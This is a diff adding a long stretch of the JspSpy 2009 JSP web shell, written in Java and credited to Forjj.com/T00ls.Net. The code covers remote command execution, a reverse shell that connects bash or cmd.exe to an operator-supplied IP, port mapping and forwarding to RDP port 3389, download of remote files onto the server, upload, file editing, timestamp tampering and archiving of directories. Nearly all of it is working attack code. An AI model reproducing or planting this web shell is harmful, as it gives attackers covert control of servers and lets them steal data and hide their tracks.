"); + if (file instanceof EnterFile) + ((EnterFile)file).close(); + } catch (ZipException e) { + JSession.setAttribute(MSG,"\""+JSession.getAttribute(ENTER).toString()+"\" Is Not a Zip File. Please Exit."); + throw e; + } catch (Exception e) { + JSession.setAttribute(MSG,"File Does Not Exist Or You Dont Have Privilege."+BACK_HREF); + throw e; + } + } + } + private static class LogoutInvoker extends DefaultInvoker { + public boolean doBefore() {return false;} + public boolean doAfter() {return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + Object dbo = JSession.getAttribute(DBO); + if (dbo != null) + ((DBOperator)dbo).close(); + Object obj = JSession.getAttribute(PORT_MAP); + if (obj != null) { + ServerSocket s = (ServerSocket)obj; + s.close(); + } + Object online = JSession.getAttribute(SHELL_ONLINE); + if (online != null) + ((OnLineProcess)online).stop(); + JSession.invalidate(); + ((Invoker)ins.get("vLogin")).invoke(request,response,JSession); + } catch (ClassCastException e) { + JSession.invalidate(); + ((Invoker)ins.get("vLogin")).invoke(request,response,JSession); + } catch (Exception e) { + + throw e ; + } + } + } + private static class UploadInvoker extends DefaultInvoker { + public boolean doBefore() {return false;} + public boolean doAfter() {return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + UploadBean fileBean = new UploadBean(); + response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); + fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); + fileBean.parseRequest(request); + JSession.setAttribute(MSG,"Upload File Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + private static class CopyInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String src = request.getParameter("src"); + String to = request.getParameter("to"); + InputStream in = null; + Object enter = JSession.getAttribute(ENTER); + if (enter == null) + in = new FileInputStream(new File(src)); + else { + ZipFile zf = new ZipFile((String)enter); + ZipEntry entry = zf.getEntry(src); + in = zf.getInputStream(entry); + } + BufferedInputStream input = new BufferedInputStream(in); + BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); + byte[] d = new byte[1024]; + int len = input.read(d); + while(len != -1) { + output.write(d,0,len); + len = input.read(d); + } + output.close(); + input.close(); + JSession.setAttribute(MSG,"Copy File Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + private static class BottomInvoker extends DefaultInvoker { + public boolean doBefore() {return false;} + public boolean doAfter() {return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + response.getWriter().println("
Copyright (C) 2009 http://www.Forjj.com/  [T00ls.Net] All Rights Reserved."+ + "
"); + } catch (Exception e) { + + throw e ; + } + } + } + private static class VCreateFileInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String path = request.getParameter("filepath"); + File f = new File(path); + if (!f.isAbsolute()) { + String oldPath = path; + path = JSession.getAttribute(CURRENT_DIR).toString(); + if (!path.endsWith("/")) + path+="/"; + path+=oldPath; + f = new File(path); + f.createNewFile(); + } else { + f.createNewFile(); + } + out.println("
"+ + "
"+ + "

Create / Edit File »

"+ + ""+ + "

Current File (import new file name and new file)
"+ + "

"+ + "

File Content

"+ + "

"+ + "
"+ + "
"); + } catch (Exception e) { + + throw e ; + } + } + } + private static class VEditInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String path = request.getParameter("filepath"); + String charset = request.getParameter("charset"); + Object enter = JSession.getAttribute(ENTER); + InputStream input = null; + if (enter != null) { + ZipFile zf = new ZipFile((String)enter); + ZipEntry entry = new ZipEntry(path); + input = zf.getInputStream(entry); + } else { + File f = new File(path); + if (!f.exists()) + return; + input = new FileInputStream(path); + } + + BufferedReader reader = null; + if (Util.isEmpty(charset) || charset.equals("ANSI")) + reader = new BufferedReader(new InputStreamReader(input)); + else + reader = new BufferedReader(new InputStreamReader(input,charset)); + StringBuffer content = new StringBuffer(); + String s = reader.readLine(); + while (s != null) { + content.append(s+"\r\n"); + s = reader.readLine(); + } + reader.close(); + out.println("
"+ + "
"+ + "

Create / Edit File »

"+ + ""+ + "

Current File (import new file name and new file)
"+ + "

"+ + "

File Content

"+ + "

"); + if (enter != null) + out.println(""); + else + out.println(""); + out.println("

"+ + "
"+ + "
"); + + } catch (Exception e) { + + throw e ; + } + } + } + private static class CreateFileInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String path = request.getParameter("filepath"); + String content = request.getParameter("filecontent"); + String charset = request.getParameter("charset"); + BufferedWriter outs = null; + if (charset.equals("ANSI")) + outs = new BufferedWriter(new FileWriter(new File(path))); + else + outs = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(path)),charset)); + outs.write(content,0,content.length()); + outs.close(); + JSession.setAttribute(MSG,"Save File "+(new File(path)).getName()+" With "+charset+" Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + private static class VEditPropertyInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String filepath = request.getParameter("filepath"); + File f = new File(filepath); + if (!f.exists()) + return; + String read = f.canRead() ? "checked=\"checked\"" : ""; + String write = f.canWrite() ? "checked=\"checked\"" : ""; + Calendar cal = Calendar.getInstance(); + cal.setTimeInMillis(f.lastModified()); + + out.println("
"+ + "
"+ + "

Set File Property »

"+ + "

Current File (FullPath)

"+ + " "+ + "

"+ + " Read "+ + " Write "+ + "

"+ + "

Instead »"+ + "year:"+ + ""+ + "month:"+ + ""+ + "day:"+ + ""+ + ""+ + "hour:"+ + ""+ + "minute:"+ + ""+ + "second:"+ + ""+ + "

"+ + "

"+ + "
"+ + "
"); + } catch (Exception e) { + throw e ; + } + } + } + private static class EditPropertyInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String f = request.getParameter("file"); + File file = new File(f); + if (!file.exists()) + return; + + String year = request.getParameter("year"); + String month = request.getParameter("month"); + String date = request.getParameter("date"); + String hour = request.getParameter("hour"); + String minute = request.getParameter("minute"); + String second = request.getParameter("second"); + + Calendar cal = Calendar.getInstance(); + cal.set(Calendar.YEAR,Integer.parseInt(year)); + cal.set(Calendar.MONTH,Integer.parseInt(month)-1); + cal.set(Calendar.DATE,Integer.parseInt(date)); + cal.set(Calendar.HOUR,Integer.parseInt(hour)); + cal.set(Calendar.MINUTE,Integer.parseInt(minute)); + cal.set(Calendar.SECOND,Integer.parseInt(second)); + if(file.setLastModified(cal.getTimeInMillis())){ + JSession.setAttribute(MSG,"Reset File Property Success!"); + } else { + JSession.setAttribute(MSG,"Reset File Property Failed!"); + } + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + //VShell + private static class VsInvoker extends DefaultInvoker{ + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String cmd = request.getParameter("command"); + String program = request.getParameter("program"); + if (cmd == null) { + if (ISLINUX) + cmd = "id"; + else + cmd = "cmd.exe /c set"; + } + if (program == null) + program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; + if (JSession.getAttribute(MSG)!=null) { + Util.outMsg(out,JSession.getAttribute(MSG).toString()); + JSession.removeAttribute(MSG); + } + out.println(""+ + "
"+ + "
"+ + "

Execute Program »

"+ + "

"+ + ""+ + ""+ + "Parameter
"+ + ""+ + "

"+ + "
"+ + "
"+ + "

Execute Shell »

"+ + "

"+ + ""+ + ""+ + "Parameter
"+ + ""+ + "

"+ + "
"+ + "
"); + } catch (Exception e) { + + throw e ; + } + } + } + private static class ShellInvoker extends DefaultInvoker{ + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String type = request.getParameter("type"); + if (type.equals("command")) { + ((Invoker)ins.get("vs")).invoke(request,response,JSession); + out.println("
"); + out.println("
");
+						String command = request.getParameter("command");
+						if (!Util.isEmpty(command)) {
+							Process pro = Runtime.getRuntime().exec(command);
+							BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+							String s = reader.readLine();
+							while (s != null) {
+								out.println(Util.htmlEncode(Util.getStr(s)));
+								s = reader.readLine();
+							}
+							reader.close();
+							reader = new BufferedReader(new InputStreamReader(pro.getErrorStream()));
+							s = reader.readLine();
+							while (s != null) {
+								out.println(Util.htmlEncode(Util.getStr(s)));
+								s = reader.readLine();
+							}
+							reader.close();
+							out.println("
"); + } + } else { + String program = request.getParameter("program"); + if (!Util.isEmpty(program)) { + Process pro = Runtime.getRuntime().exec(program); + JSession.setAttribute(MSG,"Program Has Run Success!"); + ((Invoker)ins.get("vs")).invoke(request,response,JSession); + } + } + } catch (Exception e) { + + throw e ; + } + } + } + private static class DownInvoker extends DefaultInvoker{ + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String path = request.getParameter("path"); + if (Util.isEmpty(path)) + return; + InputStream i = null; + Object enter = JSession.getAttribute(ENTER); + String fileName = null; + if (enter == null) { + File f = new File(path); + if (!f.exists()) + return; + fileName = f.getName(); + i = new FileInputStream(f); + } else { + ZipFile zf = new ZipFile((String)enter); + ZipEntry entry = new ZipEntry(path); + fileName = entry.getName().substring(entry.getName().lastIndexOf("/") + 1); + i = zf.getInputStream(entry); + } + response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(fileName,PAGE_CHARSET)); + BufferedInputStream input = new BufferedInputStream(i); + BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); + byte[] data = new byte[1024]; + int len = input.read(data); + while (len != -1) { + output.write(data,0,len); + len = input.read(data); + } + input.close(); + output.close(); + } catch (Exception e) { + + throw e ; + } + } + } + //VDown + private static class VdInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String savepath = request.getParameter("savepath"); + String url = request.getParameter("url"); + if (Util.isEmpty(url)) + url = "http://www.forjj.com/"; + if (Util.isEmpty(savepath)) { + savepath = JSession.getAttribute(CURRENT_DIR).toString(); + } + if (!Util.isEmpty(JSession.getAttribute("done"))) { + Util.outMsg(out,"Download Remote File Success!"); + JSession.removeAttribute("done"); + } + out.println("
"+ + "
"+ + "

Remote File DownLoad »

"+ + "

"+ + ""+ + "

File   URL: "+ + "

"+ + "

Save Path: "+ + "

"+ + ""+ + "

"+ + "
"); + } catch (Exception e) { + + throw e ; + } + } + } + private static class DownRemoteInvoker extends DefaultInvoker { + public boolean doBefore(){return true;} + public boolean doAfter(){return true;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String downFileUrl = request.getParameter("url"); + String savePath = request.getParameter("savepath"); + if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) + return; + URL downUrl = new URL(downFileUrl); + URLConnection conn = downUrl.openConnection(); + + File tempF = new File(savePath); + File saveF = tempF; + if (tempF.isDirectory()) { + String fName = downFileUrl.substring(downFileUrl.lastIndexOf("/")+1); + saveF = new File(tempF,fName); + } + BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); + BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(saveF)); + byte[] data = new byte[1024]; + int len = in.read(data); + while (len != -1) { + out.write(data,0,len); + len = in.read(data); + } + in.close(); + out.close(); + JSession.setAttribute("done","d"); + ((Invoker)ins.get("vd")).invoke(request,response,JSession); + } catch (Exception e) { + + throw e ; + } + } + } + private static class IndexInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + ((Invoker)ins.get("filelist")).invoke(request,response,JSession); + } catch (Exception e) { + + throw e ; + } + } + } + private static class MkDirInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String name = request.getParameter("name"); + File f = new File(name); + if (!f.isAbsolute()) { + String path = JSession.getAttribute(CURRENT_DIR).toString(); + if (!path.endsWith("/")) + path += "/"; + path += name; + f = new File(path); + } + f.mkdirs(); + JSession.setAttribute(MSG,"Make Directory Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + private static class MoveInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String src = request.getParameter("src"); + String target = request.getParameter("to"); + if (!Util.isEmpty(target) && !Util.isEmpty(src)) { + File file = new File(src); + if(file.renameTo(new File(target))) { + JSession.setAttribute(MSG,"Move File Success!"); + } else { + String msg = "Move File Failed!"; + if (file.isDirectory()) { + msg += "The Move Will Failed When The Directory Is Not Empty."; + } + JSession.setAttribute(MSG,msg); + } + response.sendRedirect(SHELL_NAME); + } + } catch (Exception e) { + + throw e ; + } + } + } + private static class RemoveDirInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String dir = request.getParameter("dir"); + File file = new File(dir); + if (file.exists()) { + deleteFile(file); + deleteDir(file); + } + + JSession.setAttribute(MSG,"Remove Directory Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + public void deleteFile(File f) { + if (f.isFile()) { + f.delete(); + }else { + File[] list = f.listFiles(); + for (int i = 0;i"+ + ""+ + ""+ + ""+ + " "+ + " "+ + " "+ + "

Pack Configuration >>

"+ + "
"+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + "
"+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + "
Packed Dir
Save To
Ext Filter"+ + " no Blacklist Whitelist"+ + "
"+ + "
Filesize Filter(KB) "+ + " no greaterthanlessthan
Exclude Dir
"+ + " "+ + "
"+ + "
" + ); + } catch (Exception e) { + + throw e; + } + } + } + private static class PackInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + private boolean config = false; + private String extFilter = "blacklist"; + private String[] fileExts = null; + private String sizeFilter = "no"; + private int filesize = 0; + private String[] exclude = null; + private String packFile = null; + private void reset(){ + this.config = false; + this.extFilter = "blacklist"; + this.fileExts = null; + this.sizeFilter = "no"; + this.filesize = 0; + this.exclude = null; + this.packFile = null; + } + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String config = request.getParameter("config"); + if (!Util.isEmpty(config) && config.equals("true")) { + this.config = true; + this.extFilter = request.getParameter("extfilter"); + this.fileExts = request.getParameter("fileext").split(","); + this.sizeFilter = request.getParameter("sizefilter"); + this.filesize = Integer.parseInt(request.getParameter("filesize")); + this.exclude = request.getParameter("exclude").split(","); + } + String packedFile = request.getParameter("packedfile"); + if (Util.isEmpty(packedFile)) + return; + this.packFile = packedFile; + String saveFileName = request.getParameter("savefilename"); + File saveF = null; + if (this.config) + saveF = new File(saveFileName); + else + saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); + if (saveF.exists()) { + JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); + response.sendRedirect(SHELL_NAME); + return; + } + File pF = new File(packedFile); + ZipOutputStream zout = null; + String base = ""; + if (pF.isDirectory()) { + if (pF.listFiles().length == 0) { + JSession.setAttribute(MSG,"No File To Pack ! Maybe The Directory Is Empty ."); + response.sendRedirect(SHELL_NAME); + this.reset(); + return; + } + zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); + zipDir(pF,base,zout); + } else { + zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); + zipFile(pF,base,zout); + } + zout.close(); + this.reset(); + JSession.setAttribute(MSG,"Pack File Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + throw e; + } + } + public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { + if (f.isDirectory()) { + if (this.config) { + String curName = f.getAbsolutePath().replace('\\','/'); + curName = curName.replaceAll("\\Q"+this.packFile+"\\E",""); + if (this.exclude != null) { + for (int i = 0;i filesize) + return; + } + } + } + ZipEntry entry = new ZipEntry(base+f.getName()); + zout.putNextEntry(entry); + FileInputStream fInput = new FileInputStream(f); + int len = 0; + byte[] buf = new byte[1024]; + while ((len = fInput.read(buf)) != -1) { + zout.write(buf, 0, len); + zout.flush(); + } + fInput.close(); + } + } + private static class UnPackInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String savepath = request.getParameter("savepath"); + String zipfile = request.getParameter("zipfile"); + if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) + return; + File save = new File(savepath); + save.mkdirs(); + ZipFile file = new ZipFile(new File(zipfile)); + Enumeration e = file.entries(); + while (e.hasMoreElements()) { + ZipEntry en = (ZipEntry) e.nextElement(); + String entryPath = en.getName(); + int index = entryPath.lastIndexOf("/"); + if (index != -1) + entryPath = entryPath.substring(0,index); + File absEntryFile = new File(save,entryPath); + if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) + absEntryFile.mkdirs(); + BufferedOutputStream output = null; + BufferedInputStream input = null; + try { + output = new BufferedOutputStream( + new FileOutputStream(new File(save,en.getName()))); + input = new BufferedInputStream( + file.getInputStream(en)); + byte[] b = new byte[1024]; + int len = input.read(b); + while (len != -1) { + output.write(b, 0, len); + len = input.read(b); + } + } catch (Exception ex) { + } finally { + try { + if (output != null) + output.close(); + if (input != null) + input.close(); + } catch (Exception ex1) { + } + } + } + file.close(); + JSession.setAttribute(MSG,"UnPack File Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + //VMapPort + private static class VmpInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + Object localIP = JSession.getAttribute("localIP"); + Object localPort = JSession.getAttribute("localPort"); + Object remoteIP = JSession.getAttribute("remoteIP"); + Object remotePort = JSession.getAttribute("remotePort"); + Object done = JSession.getAttribute("done"); + + JSession.removeAttribute("localIP"); + JSession.removeAttribute("localPort"); + JSession.removeAttribute("remoteIP"); + JSession.removeAttribute("remotePort"); + JSession.removeAttribute("done"); + + if (Util.isEmpty(localIP)) + localIP = InetAddress.getLocalHost().getHostAddress(); + if (Util.isEmpty(localPort)) + localPort = "3389"; + if (Util.isEmpty(remoteIP)) + remoteIP = "www.forjj.com"; + if (Util.isEmpty(remotePort)) + remotePort = "80"; + if (!Util.isEmpty(done)) + Util.outMsg(out,done.toString()); + + out.println("
"+ + ""+ + " "+ + " "+ + " "+ + ""+ + "

PortMap >>

"+ + "
"+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + "

Local Ip :"+ + " "+ + " 		Local Port :"+ + " Remote Ip :"+ + " Remote Port :"+ + "

"+ + " "+ + " "+ + "
"+ + "
"+ + "
"+ + "
"); + String targetIP = request.getParameter("targetIP"); + String targetPort = request.getParameter("targetPort"); + String yourIP = request.getParameter("yourIP"); + String yourPort = request.getParameter("yourPort"); + if (Util.isEmpty(targetIP)) + targetIP = "127.0.0.1"; + if (Util.isEmpty(targetPort)) + targetPort = "3389"; + if (Util.isEmpty(yourIP)) + yourIP = request.getRemoteAddr(); + if (Util.isEmpty(yourPort)) + yourPort = "53"; + out.println("
"+ + ""+ + " "+ + " "+ + " "+ + ""+ + "

Port Back >>

"+ + "
"+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + "

Target Ip :"+ + " "+ + " 		Target Port :"+ + " Your Ip :"+ + " Your Port :"+ + "

"+ + " "+ + "
"+ + "
"+ + "
"+ + "
"); + } catch (Exception e) { + + throw e ; + } + } + } + //StopMapPort + private static class SmpInvoker extends DefaultInvoker { + public boolean doAfter(){return true;} + public boolean doBefore(){return true;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + Object obj = JSession.getAttribute(PORT_MAP); + if (obj != null) { + ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); + server.close(); + } + JSession.setAttribute("done","Stop Success!"); + ((Invoker)ins.get("vmp")).invoke(request,response,JSession); + } catch (Exception e) { + + throw e ; + } + } + } + //PortBack + private static class PortBackInvoker extends DefaultInvoker { + public boolean doAfter(){return true;} + public boolean doBefore(){return true;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String targetIP = request.getParameter("targetIP"); + String targetPort = request.getParameter("targetPort"); + String yourIP = request.getParameter("yourIP"); + String yourPort = request.getParameter("yourPort"); + Socket yourS = new Socket(); + yourS.connect(new InetSocketAddress(yourIP,Integer.parseInt(yourPort))); + Socket targetS = new Socket(); + targetS.connect(new InetSocketAddress(targetIP,Integer.parseInt(targetPort))); + StreamConnector.readFromLocal(new DataInputStream(targetS.getInputStream()),new DataOutputStream(yourS.getOutputStream())); + StreamConnector.readFromRemote(targetS,yourS,new DataInputStream(yourS.getInputStream()),new DataOutputStream(targetS.getOutputStream())); + JSession.setAttribute("done","Port Back Success !"); + ((Invoker)ins.get("vmp")).invoke(request,response,JSession); + } catch (Exception e) { + + throw e ; + } + } + } + private static class MapPortInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String localIP = request.getParameter("localIP"); + String localPort = request.getParameter("localPort"); + final String remoteIP = request.getParameter("remoteIP"); + final String remotePort = request.getParameter("remotePort"); + if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) + return; + Object obj = JSession.getAttribute(PORT_MAP); + if (obj != null) { + ServerSocket s = (ServerSocket)obj; + s.close(); + } + final ServerSocket server = new ServerSocket(); + server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); + JSession.setAttribute(PORT_MAP,server); + new Thread(new Runnable(){ + public void run(){ + while (true) { + Socket soc = null; + Socket remoteSoc = null; + DataInputStream remoteIn = null; + DataOutputStream remoteOut = null; + DataInputStream localIn = null; + DataOutputStream localOut = null; + try{ + soc = server.accept(); + remoteSoc = new Socket(); + remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); + remoteIn = new DataInputStream(remoteSoc.getInputStream()); + remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); + localIn = new DataInputStream(soc.getInputStream()); + localOut = new DataOutputStream(soc.getOutputStream()); + StreamConnector.readFromLocal(localIn,remoteOut); + StreamConnector.readFromRemote(soc,remoteSoc,remoteIn,localOut); + }catch(Exception ex) + { + break; + } + } + } + + }).start(); + JSession.setAttribute("done","Map Port Success!"); + JSession.setAttribute("localIP",localIP); + JSession.setAttribute("localPort",localPort); + JSession.setAttribute("remoteIP",remoteIP); + JSession.setAttribute("remotePort",remotePort); + JSession.setAttribute(SESSION_O,"vmp"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + //VBackConnect + private static class VbcInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + Object ip = JSession.getAttribute("ip"); + Object port = JSession.getAttribute("port"); + Object program = JSession.getAttribute("program"); + Object done = JSession.getAttribute("done"); + JSession.removeAttribute("ip"); + JSession.removeAttribute("port"); + JSession.removeAttribute("program"); + JSession.removeAttribute("done"); + if (Util.isEmpty(ip)) + ip = request.getRemoteAddr(); + if (Util.isEmpty(port) || !Util.isInteger(port.toString())) + port = "53"; + if (Util.isEmpty(program)) { + if (ISLINUX) + program = "/bin/bash"; + else + program = "cmd.exe"; + } + + if (!Util.isEmpty(done)) + Util.outMsg(out,done.toString()); + out.println("
"+ + ""+ + " "+ + " "+ + " "+ + ""+ + "

Back Connect >>

"+ + "
"+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + "
Your Ip :"+ + " "+ + " Your Port :"+ + " Program To Back :"+ + "

"+ + " "+ + "
"+ + "
"+ + "
"+ + "
"); + } catch (Exception e) { + + throw e ; + } + } + } + private static class BackConnectInvoker extends DefaultInvoker { + public boolean doAfter(){return false;} + public boolean doBefore(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String ip = request.getParameter("ip"); + String port = request.getParameter("port"); + String program = request.getParameter("program"); + if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) + return; + Socket socket = new Socket(ip,Integer.parseInt(port)); + Process process = Runtime.getRuntime().exec(program); + (new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); + (new StreamConnector(process.getErrorStream(), socket.getOutputStream())).start(); + (new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); + JSession.setAttribute("done","Back Connect Success!"); + JSession.setAttribute("ip",ip); + JSession.setAttribute("port",port); + JSession.setAttribute("program",program); + JSession.setAttribute(SESSION_O,"vbc"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + private static class JspEnvInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + out.println(""+ + " "+ + " "+ + " "+ + "

System Properties >>

"+ + "
"+ + "
"+ + "
    "); + Properties pro = System.getProperties(); + Enumeration names = pro.propertyNames(); + while (names.hasMoreElements()){ + String name = (String)names.nextElement(); + out.println("
  • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
    • "); + } + out.println("

System Environment >>

    "); + /* + Map envs = System.getenv(); + Set> entrySet = envs.entrySet(); + for (Map.Entry en:entrySet) { + out.println("
  • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
    • "); + }*/ + out.println("
"); + } catch (Exception e) { + + throw e ; + } + } + } + private static class ReflectInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String c = request.getParameter("Class"); + Class cls = null; + try { + if (!Util.isEmpty(c)) + cls = Class.forName(c); + } catch (ClassNotFoundException ex) { + Util.outMsg(out,"Class "+c+" Not Found ! "); + } + out.println("
"+ + " "+ + " "+ + " "+ + " "+ + " "+ + "

Java Reflect >>

"+ + " "+ + " "+ + " "+ + " "+ + " "+ + "
Class Name : "+ + "
"+ + "
"+ + "
"); + + if (cls != null) { + StringBuffer sb = new StringBuffer(); + if (cls.getPackage() != null) + sb.append("package "+cls.getPackage().getName()+";\n"); + String n = null; + if (cls.isInterface()) + n = ""; + //else if (cls.isEnum()) + // n = "enum"; + else + n = "class"; + sb.append(Modifier.toString(cls.getModifiers())+" "+n+" "+cls.getName()+"\n"); + if (cls.getSuperclass() != null) + sb.append("\textends "+cls.getSuperclass().getName()+"\n"); + if (cls.getInterfaces() != null && cls.getInterfaces().length != 0) { + Class[] faces = cls.getInterfaces(); + sb.append("\t implements "); + for (int i = 0;i"+faces[i].getName()+""); + if (i != faces.length -1) { + sb.append(","); + } + } + } + sb.append("{\n\t\n"); + sb.append("\t//constructors..\n"); + Constructor[] cs = cls.getConstructors(); + for (int i = 0;i"); + if (obj != null) + sb.append(obj.toString()); + else + sb.append("NULL"); + + sb.append(""); + } + sb.append("\n"); + } + + sb.append("\n\t//methods\n"); + Method[] ms = cls.getDeclaredMethods(); + for (int i =0;i")+""; + Util.outMsg(out,m,"left"); + } + } catch (Exception e) { + throw e; + } + } + } + private static class TopInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + out.println("
"+ + ""+ + " "+ + " "+ + " "+ + " "+ + " "+ + "
JspSpy Ver: 2009 Private "+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+") | copy
Logout | "+ + " File Manager | "+ + " DataBase Manager | "+ + " Execute Command | "+ + " Shell OnLine | "+ + " Back Connect | "+ + " Java Reflect | "+ + " "+ + " Eval Java Code | "+ + " Port Scan | "+ + " Download Remote File | "+ + " ClipBoard | "+ + " Port Map | "+ + " Others | "+ + " JSP Env "+ + "
